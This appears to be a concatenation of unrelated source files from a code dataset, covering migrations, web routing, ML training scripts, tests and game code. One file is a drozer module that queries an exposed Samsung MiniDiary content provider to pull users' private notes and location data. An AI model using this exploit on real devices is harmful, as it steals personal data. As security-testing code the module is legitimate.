c2fdd9630eb7926aa146154e2e47cdea62cb82b4 | 89bfd26dc9cc8eb90adbb6bfc9aef0fa34705e9c | /migrations/versions/9baecab3227c_.py | 5421ebdbd8b81b4858ef5887505a52f2b0fc3a81 | [] | no_license | MaksTresh/forum-flask | c1d2d4615bb18e00e55b839be23c8f8b76b30f3e | 8b0da4bc3a0ac2789fd3988118b7f680f2f69fc8 | refs/heads/master | 2021-08-18T22:51:00.681691 | 2020-04-15T09:03:50 | 2020-04-15T09:03:50 | 162,621,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py | """empty message
Revision ID: 9baecab3227c
Revises: 54bd0f7227e0
Create Date: 2018-11-18 20:07:44.124918
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '9baecab3227c'
down_revision = '54bd0f7227e0'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('comment',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.String(length=1000), nullable=True),
sa.Column('image', sa.String(length=500), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.add_column('post', sa.Column('header', sa.String(length=30), nullable=True))
op.add_column('post', sa.Column('rating', sa.String(length=1000000), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('post', 'rating')
op.drop_column('post', 'header')
op.drop_table('comment')
# ### end Alembic commands ###
| [
"mmakstresh@gmail.com"
] | mmakstresh@gmail.com |
eb9acff83caf6b18ce66a9e805bdb61b22b2f7ad | 1bbf2f808f15a1320c02498230919b8bb3b83dc3 | /Trabalho 3 - Chat completo/protocol.py | 7cc5f22e647a5961358da35889f424526128dbbd | [] | no_license | ddrc1/Redes-2 | 58b05448462d50546ce67f077b9d86b095cac11d | 9ece988e4707103ad743f29817571c16290a22f7 | refs/heads/master | 2021-03-09T23:38:29.616072 | 2020-03-13T02:29:02 | 2020-03-13T02:29:02 | 246,394,422 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,964 | py | import struct
from enum import Enum
from abc import ABC, abstractmethod
# Definições do protocolo
PROTOCOL_VERSION = 1
PROTOCOL_HEADER_FORMAT = '!BHB'
PROTOCOL_HEADER_LENGTH = struct.calcsize(PROTOCOL_HEADER_FORMAT)
# Tipos de Mensagem
NICKNAME_MESSAGE_TYPE = 1
CHAT_MESSAGE_TYPE = 2
CLIENT_CONNECTION_TYPE = 3
CLIENT_CLOSE_CONN_TYPE = 4
def getMessageClass(msg):
if "\\nickname " in msg:
print("nick")
return NicknameMessage(msg.lstrip("\\nickname "))
elif "\close" in msg:
return CloseMessage(msg.lstrip("\close "))
else:
print("mesg")
return ChatMessage(msg)
# Classe base do protocolo
class BaseProtocol(ABC):
def __init__(self):
self.version = 0
self.length = 0
self.type = 0
@abstractmethod
def get_bytes(self):
pass
@staticmethod
@abstractmethod
def from_buffer(msg):
pass
# Classe que representa a mensagem de atribuição do nickname
class NicknameMessage(BaseProtocol):
def __init__(self, nickname):
super().__init__()
self.version = PROTOCOL_VERSION
self.type = NICKNAME_MESSAGE_TYPE
self.length = PROTOCOL_HEADER_LENGTH + len(nickname.encode('utf8'))
self.nickname = nickname
def get_bytes(self):
return struct.pack(f'{PROTOCOL_HEADER_FORMAT}{self.length - PROTOCOL_HEADER_LENGTH}s', self.version, self.length, self.type, self.nickname.encode('utf8'))
@staticmethod
def from_buffer(msg):
data = struct.unpack(f'{PROTOCOL_HEADER_FORMAT}{len(msg) - PROTOCOL_HEADER_LENGTH}s', msg)
return NicknameMessage(str(data[3],'utf8'))
# Classe que representa uma mensagem do chat
class ChatMessage(BaseProtocol):
def __init__(self, msg):
super().__init__()
self.version = PROTOCOL_VERSION
self.type = CHAT_MESSAGE_TYPE
self.length = PROTOCOL_HEADER_LENGTH + len(msg.encode('utf8'))
self.msg = msg
def get_bytes(self):
return struct.pack(f'{PROTOCOL_HEADER_FORMAT}{self.length - PROTOCOL_HEADER_LENGTH}s', self.version, self.length, self.type, self.msg.encode('utf8'))
@staticmethod
def from_buffer(msg):
data = struct.unpack(f'{PROTOCOL_HEADER_FORMAT}{len(msg) - PROTOCOL_HEADER_LENGTH}s', msg)
return ChatMessage(str(data[3],'utf8'))
class CloseMessage(BaseProtocol):
def __init__(self, nick):
super().__init__()
self.version = PROTOCOL_VERSION
self.type = CLIENT_CLOSE_CONN_TYPE
self.length = PROTOCOL_HEADER_LENGTH
self.nick = nick
def get_bytes(self):
return struct.pack(f'{PROTOCOL_HEADER_FORMAT}{self.length - PROTOCOL_HEADER_LENGTH}s', self.version, self.length, self.type, f"\close {self.nick}".encode('utf8'))
@staticmethod
def from_buffer(nick):
data = struct.unpack(f'{PROTOCOL_HEADER_FORMAT}{len(nick) - PROTOCOL_HEADER_LENGTH}s', nick)
return CloseMessage(nick)
| [
"danielrotheia@gmail.com"
] | danielrotheia@gmail.com |
9e3d7a39f03e12281ca6a9bc758c4adbf7873c01 | eee7b11df02e30b023532b73c015fd6eedef8998 | /mysite/urls.py | dadab4c98f9305a601c28ba055d1d2b9f9be6c7a | [] | no_license | soymelisa/my-first-django-blog | 679cdee3b197c24fc0e3a63f2f348eb274b826ad | cb21cadd9177810dfd695183a33228e9a360fa6b | refs/heads/master | 2020-06-25T03:39:18.584302 | 2019-07-29T18:24:47 | 2019-07-29T18:24:47 | 199,188,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, include
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('blog.urls')),
] | [
"soymelisa@yahoo.com"
] | soymelisa@yahoo.com |
63cfbd9c8ad9930ad2a5cbaf21d054591384d6bb | 1ee963824666f3bf987d5aff861d9697ba42a78e | /app/node_modules/mongoose/node_modules/mongodb/node_modules/bson/build/config.gypi | a8a1c681f9e3233d3948a5301339c9bd917d66da | [
"Apache-2.0",
"MIT"
] | permissive | Darkninja/blog | bf03599c605ab606f8585ec5aeedf42d2d8e45a1 | cb3120f06ccf745692aec37fd170bf81ba34cc77 | refs/heads/master | 2021-01-18T08:41:42.125237 | 2013-03-13T10:15:23 | 2013-03-13T10:15:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,737 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 46,
"host_arch": "x64",
"node_install_npm": "false",
"node_install_waf": "true",
"node_prefix": "/usr",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"target_arch": "x64",
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"nodedir": "/home/norder/.node-gyp/0.8.20",
"copy_dev_lib": "true",
"cache_lock_stale": "60000",
"pre": "",
"sign_git_tag": "",
"user_agent": "node/v0.8.20 linux x64",
"always_auth": "",
"bin_links": "true",
"fetch_retries": "2",
"description": "true",
"init_version": "0.0.0",
"user": "",
"force": "",
"ignore": "",
"cache_min": "10",
"editor": "vi",
"rollback": "true",
"cache_max": "null",
"userconfig": "/home/norder/.npmrc",
"init_author_url": "",
"yes": "",
"init_author_name": "",
"coverage": "",
"tmp": "/home/norder/tmp",
"userignorefile": "/home/norder/.npmignore",
"engine_strict": "",
"usage": "",
"depth": "null",
"save_dev": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr",
"registry": "https://registry.npmjs.org/",
"versions": "",
"searchopts": "",
"save_optional": "",
"cache_lock_wait": "10000",
"browser": "",
"cache": "/home/norder/.npm",
"version": "",
"searchsort": "name",
"npaturl": "http://npat.npmjs.org/",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "18",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"global": "",
"link": "",
"unicode": "true",
"save": "",
"unsafe_perm": "true",
"long": "",
"production": "",
"node_version": "v0.8.20",
"tag": "latest",
"fetch_retry_factor": "10",
"username": "",
"proprietary_attribs": "true",
"npat": "",
"strict_ssl": "true",
"parseable": "",
"globalconfig": "/usr/etc/npmrc",
"init_module": "/home/norder/.npm-init.js",
"dev": "",
"globalignorefile": "/usr/etc/npmignore",
"cache_lock_retries": "10",
"init_author_email": "",
"searchexclude": "",
"group": "1000",
"optional": "true",
"git": "git",
"json": ""
}
}
| [
"me@andrewsking.com"
] | me@andrewsking.com |
5d41e4fc84e6338c49bce2a6c1a44559d4fcac24 | 809d126d0785687f20e14fd71a529dbf73dd1f5e | /store/main/routes.py | 3c637972167fc1698bd695e3862fc7b6ee1b6714 | [
"MIT"
] | permissive | isaacrivas10/fb_chatbot | 1aa129e32919167d68d71cac9895c491e73d3086 | 01a78e690e698609a5b89dc8f04c216b248f5047 | refs/heads/master | 2022-12-10T23:48:51.002548 | 2020-03-10T02:36:01 | 2020-03-10T02:36:01 | 229,897,442 | 0 | 0 | MIT | 2022-12-08T03:20:59 | 2019-12-24T07:52:05 | CSS | UTF-8 | Python | false | false | 560 | py |
from flask import Blueprint, render_template
from flask_login import current_user
main= Blueprint('main', __name__)
@main.route("/")
@main.route("/home")
def home():
if current_user.is_authenticated:
return render_template('index.html', show=True, isauth=True)
return render_template('soon.html')
"""
@main.route("/privacy_policy", methods=['GET'])
def privacy_policy():
return render_template('privacy_policy.html', title='Privacy Policy')
"""
@main.route('/<path:page>')
def anypage(page):
return render_template('soon.html') | [
"idrc74@hotmail.com"
] | idrc74@hotmail.com |
031ac86eb737e0cb3cf325efa6c5fc736ac1dd8d | 96721286424fa257d6b969ddd4e823e22fe2bcda | /venv/lib/python3.5/site-packages/easy_thumbnails/source_generators.py | c8969b7241ded68ee56568a0cdb623a0e48ebc29 | [
"MIT"
] | permissive | Deepanjalli/job_portal6 | 6a44482c8a3c89e8babae259a5390ec89e73e580 | 2869de5dca16a88f840ce0e4a26fe2edba3e9cae | refs/heads/master | 2021-09-10T09:00:21.791857 | 2020-02-24T07:13:04 | 2020-02-24T07:13:04 | 242,659,782 | 0 | 0 | MIT | 2021-09-08T01:50:58 | 2020-02-24T06:08:25 | Python | UTF-8 | Python | false | false | 1,057 | py | from io import BytesIO
from PIL import Image, ImageFile
from easy_thumbnails import utils
def pil_image(source, exif_orientation=True, **options):
"""
Try to open the source file directly using PIL, ignoring any errors.
exif_orientation
If EXIF orientation data is present, perform any required reorientation
before passing the data along the processing pipeline.
"""
# Use a BytesIO wrapper because if the source is an incomplete file like
# object, PIL may have problems with it. For example, some image types
# require tell and seek methods that are not present on all storage
# File objects.
if not source:
return
source = BytesIO(source.read())
image = Image.open(source)
# Fully load the image now to catch any problems with the image contents.
try:
ImageFile.LOAD_TRUNCATED_IMAGES = True
image.load()
finally:
ImageFile.LOAD_TRUNCATED_IMAGES = False
if exif_orientation:
image = utils.exif_orientation(image)
return image
| [
"deepz9733@gmail.com"
] | deepz9733@gmail.com |
a7fb3e98a1693472240d1701c60eabe016e852f8 | 44b7bdb64f90d5d6628ffa81e4fcccdaac8aad51 | /metall0id/pilfer/samsung/gsii/minidiary.py | 39e15def420aad692f2c96a8e6a5edf1df2e46c9 | [] | no_license | LogicalTrust/drozer-modules | 65005ac30d860693e178bba81eeb00075755f2f8 | d39fceba96f7f885c015ab79c6d3dd7cd1d9e8b9 | refs/heads/master | 2021-01-01T19:40:47.371947 | 2018-03-10T08:35:43 | 2018-03-10T08:35:43 | 98,646,524 | 2 | 0 | null | 2017-08-02T07:37:56 | 2017-07-28T12:15:50 | Python | UTF-8 | Python | false | false | 1,220 | py | from drozer.modules import common, Module
class MiniDiary(Module, common.Provider, common.TableFormatter, common.Vulnerability):
name = "Tests for Content Provider vulnerability in com.sec.android.app.minidiary."
description = "Tests for Content Provider vulnerability in com.sec.android.app.minidiary."
examples = ""
author = "Tyrone (@mwrlabs)"
date = "2012-11-06"
license = "BSD (3 clause)"
path = ["exploit", "pilfer", "oem", "samsung"]
permissions = ["com.mwr.dz.permissions.GET_CONTEXT"]
label = "Note entries from MiniDiary (com.sec.android.app.minidiary)"
def exploit(self, arguments):
c = self.getCursor()
if c != None:
rows = self.getResultSet(c)
self.print_table(rows, show_headers=True)
else:
self.stdout.write("Unknown Error.\n")
def getCursor(self):
return self.contentResolver().query("content://com.sec.android.providers.minidiary.MiniDiaryData/diary", projection=["_id", "location", "date", "longitude", "latitude", "picture_file", "note"])
def isVulnerable(self, arguments):
cursor = self.getCursor()
return cursor != None and cursor.getCount() > 0
| [
"daniel.bradberry@mwrinfosecurity.com"
] | daniel.bradberry@mwrinfosecurity.com |
35c2f0858f1e0b8ebe8a568c171b19c24fd7c125 | 8111fe5c304b7d0c9c3c8eba5813cf380db7f29e | /test7.py | 6ff5bf46c16cde9a6b65f64619530596eb5f2648 | [] | no_license | poonamsl/JenkinsTests | 2c978689bdcdc728fe672245483498526af675a2 | 2432c5cea356908d7ed4b5ba2f672a28d43d0532 | refs/heads/master | 2023-05-02T16:11:20.660451 | 2023-04-24T20:57:33 | 2023-04-24T20:57:33 | 61,320,225 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,433 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
#import sauceclient
import os
import json
# Retrieving environment variables
SAUCE_USERNAME = os.environ.get('SAUCE_USERNAME')
SAUCE_ACCESS_KEY = os.environ.get('SAUCE_ACCESS_KEY')
#sauce_client = SauceClient(SAUCE_USERNAME,SAUCE_ACCESS_KEY)
myUrl = 'http://' + SAUCE_USERNAME + ':' + SAUCE_ACCESS_KEY + '@ondemand.saucelabs.com:80/wd/hub';
SauceOnDemandBrowsers_String = os.environ.get('SAUCE_ONDEMAND_BROWSERS')
print "Build name is " + os.environ.get('JENKINS_BUILD_NUMBER')
parsed_json = json.loads(SauceOnDemandBrowsers_String)
num = len(parsed_json)
for i in range(num):
currentCaps = parsed_json[i]
# The command_executor tells the test to run on Sauce, while the desired_capabilitues
# parameter tells us which browsers and OS to spin up
desired_cap = {
'platform': currentCaps['os'],
'browserName': currentCaps['browser'],
'version': currentCaps['browser-version'],
'name':'test7',
'public':'public',
'build':os.environ.get('JENKINS_BUILD_NUMBER')
}
driver = webdriver.Remote(command_executor=myUrl,desired_capabilities=desired_cap)
driver.get("http://www.google.com")
print desired_cap
print "SauceOnDemandSessionID=" + driver.session_id + " job-name=test7"
driver.quit()
#sauce_client.jobs.update_job(driver.session_id, passed=True)
| [
"noreply@github.com"
] | noreply@github.com |
25069dd9e77118a997038dcb2d699948baacf6b6 | d38d988114f8487e4c0d1674191b6f2865eac70d | /gru.py | 7b20014606ce44db1d77d34a341bc6b2b10aa40b | [
"MIT"
] | permissive | dizcza/ujipen | 71cc1612fcc8247a7cae1a2da9ea13cb2fca38e8 | 4e7d2ff1bd6d659743fdf68e49894236cd559b84 | refs/heads/master | 2021-07-05T19:03:00.701898 | 2020-09-11T18:48:57 | 2020-09-11T18:48:57 | 171,858,288 | 1 | 1 | MIT | 2019-10-30T09:28:42 | 2019-02-21T11:19:50 | Python | UTF-8 | Python | false | false | 2,371 | py | from typing import List, Dict
import numpy as np
from keras import layers, models
from constants import *
from helper import check_unique_patterns
from preprocess import equally_spaced_points_patterns, is_inside_box
from ujipen.ujipen_class import UJIPen
def concat_samples(samples: Dict[str, List[List[np.ndarray]]]):
labels = []
data = []
for letter in samples.keys():
letter_ord = ord(letter) - ord('a')
labels.extend([letter_ord] * len(samples[letter]))
for word_sample in samples[letter]:
word_sample = np.vstack(word_sample)
data.append(word_sample)
data = np.stack(data, axis=0)
assert is_inside_box(data, box=((-1, -1), (1, 1)))
labels = np.array(labels)
print(f"Data: {data.shape}, labels: {labels.shape}")
return data, labels
def train(ujipen: UJIPen, n_input=PATTERN_SIZE, n_hidden=50):
patterns = ujipen.get_samples(fold='train')
patterns = equally_spaced_points_patterns(patterns, total_points=n_input)
train_data, train_labels = concat_samples(patterns)
test_samples = equally_spaced_points_patterns(ujipen.get_samples(fold='test'), total_points=n_input)
test_data, test_labels = concat_samples(test_samples)
assert check_unique_patterns(patterns, n_points=n_input)
gru = models.Sequential()
gru.add(layers.GRU(units=n_hidden, activation='tanh', recurrent_activation='hard_sigmoid',
return_sequences=False, implementation=1,
input_shape=(n_input, 2)))
gru.add(layers.Dense(units=np.unique(train_labels).size, activation='softmax'))
print(gru.summary())
gru.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
history = gru.fit(train_data, train_labels, epochs=100, batch_size=32, validation_data=(test_data, test_labels),
verbose=0)
history = history.history
accuracy_train = history['acc'][-1]
print(f"Loss: {history['loss'][-1]:.5f}, accuracy: train={accuracy_train:.5f}, val={history['val_acc'][-1]:.5f}")
MODELS_DIR.mkdir(exist_ok=True)
model_path = str(MODELS_DIR / f'GRU_input-{n_input}_hidden-{n_hidden}_acc-{accuracy_train:.4f}.h5')
gru.save(model_path)
print(f"Saved trained model to {model_path}")
if __name__ == '__main__':
train(ujipen=UJIPen(), n_input=30, n_hidden=100)
| [
"dizcza@gmail.com"
] | dizcza@gmail.com |
c5938159509a69c4d911d0b67d9fe2ccb67844f4 | 70b339d0b2638a7914d0d56c5edf8a2637c9f4b0 | /countUnivalSubtrees.py | debb8570ebae08b08bd35f2a07e56136d4acbf9a | [] | no_license | pflun/advancedAlgorithms | 9991da7514024e18ba08de8688966b9220e12571 | 5520dbcd26999b98e1229bf03c2f62dd690a2ddc | refs/heads/master | 2023-02-19T12:05:26.902535 | 2023-02-14T06:08:54 | 2023-02-14T06:08:54 | 189,055,701 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,234 | py | # -*- coding: utf-8 -*-
# 分别看左右子树返回值是否与根相等,分情况讨论
# https://mnmunknown.gitbooks.io/algorithm-notes/content/61_tree.html
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def countUnivalSubtrees(self, root):
self.res = 0
def postorder(root):
if root is None:
return None
# 叶子节点也算一个子树
if root.left is None and root.right is None:
self.res += 1
return root.val
if root.left:
left = postorder(root.left)
if root.right:
right = postorder(root.right)
# 左右子树都存在
if root.left and root.right:
# 左右儿子和根值相等
if left == right:
if left is root.val:
self.res += 1
else:
return False
else:
# 左儿子和根相等
if left == root.val:
self.res += 1
# 或者右儿子和根相等
elif right == root.val:
self.res += 1
# 只存在左子树
elif root.left and not root.right:
# 左儿子和根相等
if left == root.val:
self.res += 1
else:
return False
elif root.right and not root.left:
if right == root.val:
self.res += 1
else:
return False
return root.val
postorder(root)
return self.res
head_node = TreeNode(0)
n1 = TreeNode(1)
n2 = TreeNode(0)
n3 = TreeNode(5)
n4 = TreeNode(4)
n5 = TreeNode(5)
n6 = TreeNode(5)
n7 = TreeNode(5)
head_node.left = n1
head_node.right = n2
n1.left = n3
n1.right = n4
n3.left = n6
n6.left = n5
n6.right = n7
test1 = Solution()
print test1.countUnivalSubtrees(head_node)
# 0
# 1 0
# 5 4
# 5
#5 5 | [
"zgao@gwu.edu"
] | zgao@gwu.edu |
7b731c6f011fa87393d4ce9b59e7a664722cbc56 | 30150c7f6ed7a10ac50eee3f40101bc3165ebf9e | /src/coghq/FactoryEntityCreatorAI.py | f46ac38d6fdd0fa9403d61345de5892119f286e3 | [] | no_license | toontown-restoration-project/toontown | c2ad0d552cb9d5d3232ae6941e28f00c11ca3aa8 | 9bef6d9f823b2c12a176b33518eaa51ddbe3fd2f | refs/heads/master | 2022-12-23T19:46:16.697036 | 2020-10-02T20:17:09 | 2020-10-02T20:17:09 | 300,672,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,100 | py | """FactoryEntityCreatorAI module: contains the FactoryEntityCreatorAI class"""
from otp.level import EntityCreatorAI
from direct.showbase.PythonUtil import Functor
from . import DistributedBeanBarrelAI
from . import DistributedButtonAI
from . import DistributedCrateAI
from . import DistributedLiftAI
from . import DistributedDoorEntityAI
from . import DistributedGagBarrelAI
from . import DistributedGridAI
from toontown.suit import DistributedGridGoonAI
from toontown.suit import DistributedGoonAI
from . import DistributedHealBarrelAI
from . import DistributedStomperPairAI
from . import DistributedTriggerAI
from . import DistributedStomperAI
from . import DistributedLaserFieldAI
from . import DistributedSecurityCameraAI
from . import DistributedMoverAI
from . import DistributedElevatorMarkerAI
from . import DistributedSinkingPlatformAI
from . import ActiveCellAI
from . import CrusherCellAI
from . import DirectionalCellAI
from . import FactoryLevelMgrAI
from . import BattleBlockerAI
from . import DistributedGolfGreenGameAI
from toontown.coghq import DistributedMoleFieldAI
from toontown.coghq import DistributedMazeAI
class FactoryEntityCreatorAI(EntityCreatorAI.EntityCreatorAI):
def __init__(self, level):
EntityCreatorAI.EntityCreatorAI.__init__(self, level)
# create short aliases for EntityCreatorAI create funcs
cDE = EntityCreatorAI.createDistributedEntity
cLE = EntityCreatorAI.createLocalEntity
nothing = EntityCreatorAI.nothing
self.privRegisterTypes({
'activeCell' : Functor(cDE, ActiveCellAI.ActiveCellAI),
'crusherCell' : Functor(cDE, CrusherCellAI.CrusherCellAI),
'battleBlocker' : Functor(cDE, BattleBlockerAI.BattleBlockerAI),
'beanBarrel': Functor(cDE, DistributedBeanBarrelAI.DistributedBeanBarrelAI),
'button': DistributedButtonAI.DistributedButtonAI,
'conveyorBelt' : nothing,
'crate': Functor(cDE, DistributedCrateAI.DistributedCrateAI),
'directionalCell' : Functor(cDE, DirectionalCellAI.DirectionalCellAI),
'door': DistributedDoorEntityAI.DistributedDoorEntityAI,
'gagBarrel': Functor(cDE, DistributedGagBarrelAI.DistributedGagBarrelAI),
'gear': nothing,
'goon': Functor(cDE, DistributedGoonAI.DistributedGoonAI),
'gridGoon': Functor(cDE, DistributedGridGoonAI.DistributedGridGoonAI),
'golfGreenGame': Functor(cDE, DistributedGolfGreenGameAI.DistributedGolfGreenGameAI),
'goonClipPlane' : nothing,
'grid': Functor(cDE, DistributedGridAI.DistributedGridAI),
'healBarrel': Functor(cDE, DistributedHealBarrelAI.DistributedHealBarrelAI),
'levelMgr': Functor(cLE, FactoryLevelMgrAI.FactoryLevelMgrAI),
'lift': Functor(cDE, DistributedLiftAI.DistributedLiftAI),
'mintProduct': nothing,
'mintProductPallet': nothing,
'mintShelf': nothing,
'mover': Functor(cDE, DistributedMoverAI.DistributedMoverAI),
'paintMixer': nothing,
'pathMaster': nothing,
'rendering': nothing,
'platform': nothing,
'sinkingPlatform': Functor(cDE, DistributedSinkingPlatformAI.DistributedSinkingPlatformAI),
'stomper': Functor(cDE, DistributedStomperAI.DistributedStomperAI),
'stomperPair': Functor(cDE, DistributedStomperPairAI.DistributedStomperPairAI),
'laserField': Functor(cDE, DistributedLaserFieldAI.DistributedLaserFieldAI),
'securityCamera': Functor(cDE, DistributedSecurityCameraAI.DistributedSecurityCameraAI),
'elevatorMarker': Functor(cDE, DistributedElevatorMarkerAI.DistributedElevatorMarkerAI),
#'laserField': Functor(cDE, DistributedStomperAI.DistributedStomperAI),
'trigger': DistributedTriggerAI.DistributedTriggerAI,
'moleField': Functor(cDE, DistributedMoleFieldAI.DistributedMoleFieldAI),
'maze': Functor(cDE, DistributedMazeAI.DistributedMazeAI),
})
| [
"brianlach72@gmail.com"
] | brianlach72@gmail.com |
81e3fd66b95ae9164e10826cf96b469c11dc802c | 69885b865879678a1b70214bf1a0c7c742eb989d | /Vehicles_detection/tiny_YOLO/tiny_train.py | 579e8dd6bdf55cc81f5da5471b0958f331553506 | [] | no_license | Key1994/Course_of_self-driving_car_Udacity | 5c794811845007dca424dac70dce2c56fb475f38 | 83e34a68a9a4fb21cb9e8d738770c203780a845e | refs/heads/master | 2022-12-08T05:23:10.225984 | 2020-09-04T06:31:39 | 2020-09-04T06:31:39 | 291,411,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,377 | py |
import numpy as np
import keras.backend as K
from keras.layers import Input, Lambda
from keras.models import Model
from keras.callbacks import TensorBoard, ModelCheckpoint
from yolo3.tinymodel import preprocess_true_boxes, tiny_yolo_body, yolo_loss
from yolo3.utils import get_random_data
def _main():
annotation_path = '/.../KITTI/train.txt' # load the path of train set
log_dir = '/.../model_data/' # define the path to save the model data
classes_path = '/.../model_data/object_classes.txt' # load the classes of objects
anchors_path = '/.../model_data/tiny_yolo_anchors.txt' # load the anchors data
class_names = get_classes(classes_path)
anchors = get_anchors(anchors_path)
input_shape = (416,416) # define the size of input image
model = create_model(input_shape, anchors, len(class_names)) # establish the structure of model
train(model, annotation_path, input_shape, anchors, len(class_names), log_dir=log_dir) # train the model
def train(model, annotation_path, input_shape, anchors, num_classes, log_dir='logs/'):
model.compile(optimizer='adam', loss={
'yolo_loss': lambda y_true, y_pred: y_pred})
tensorboard = TensorBoard(log_dir=log_dir)
checkpoint = ModelCheckpoint(log_dir + "best_weights.h5",
monitor="val_loss",
mode='min',
save_weights_only=False,
save_best_only=False,
verbose=1,
period=1)
callback_lists=[tensorboard,checkpoint]
batch_size = 64
val_split = 0.05
with open(annotation_path) as f:
lines = f.readlines()
np.random.shuffle(lines)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrap(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrap(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=30, # set epochs
initial_epoch=0, callbacks=callback_lists, verbose=1)
model.save(log_dir + 'tiny_yolo.h5')
model.save_weights(log_dir + 'tiny-trained.weights')
def get_classes(classes_path):
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def create_model(input_shape, anchors, num_classes, load_pretrained=False, freeze_body=False,
weights_path='/.../model_data/best_weights.h5'):
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16}[l], w//{0:32, 1:16}[l], num_anchors//3, num_classes+5)) for l in range(2)]
model_body = tiny_yolo_body(image_input, num_anchors//3, num_classes)
print('Create YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=False, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body:
# Do not freeze 3 output layers.
num = len(model_body.layers)-7
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
# define the loss function
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.5})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
print(n)
np.random.shuffle(annotation_lines)
i = 0
while True:
image_data = []
box_data = []
for b in range(batch_size):
i %= n
image, box = get_random_data(annotation_lines[i], input_shape, random=False)
#image = cv2.resize(image, (224, 224))
image_data.append(image)
box_data.append(box)
i += 1
image_data = np.array(image_data)
box_data = np.array(box_data)
y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)
yield [image_data, *y_true], np.zeros(batch_size)
def data_generator_wrap(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
if n==0 or batch_size<=0: return None
return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes)
if __name__ == '__main__':
_main()
| [
"noreply@github.com"
] | noreply@github.com |
7783d9c426e2ee2332c1ba6930383030038a5c3e | ad6f20ca36dc65e34b43c69db66f383554718fed | /already_asked_questions/bridged/V0/webscrapping_selenium.py | 4f072b6e3aeb36b938b5851bd533e9e9e98a6b03 | [] | no_license | atulanandnitt/questionsBank | 3df734c7389959801ab6447c0959c85f1013dfb8 | 477accc02366b5c4507e14d2d54850a56947c91b | refs/heads/master | 2021-06-11T21:39:24.682159 | 2021-05-06T17:54:18 | 2021-05-06T17:54:18 | 175,861,522 | 0 | 1 | null | 2020-05-02T09:26:25 | 2019-03-15T17:10:06 | Python | UTF-8 | Python | false | false | 470 | py | from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
chrome_options.add_argument("--headless")
url ="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L"
d = webdriver.Chrome(chrome_options=chrome_options)
d.get(url)
print(d.find_element_by_css_selector("#cvss-overall-score-chart > div.jqplot-point-label.jqplot-series-0.jqplot-point-0").text)
d.quit()
| [
"atul.anand.nitt"
] | atul.anand.nitt |
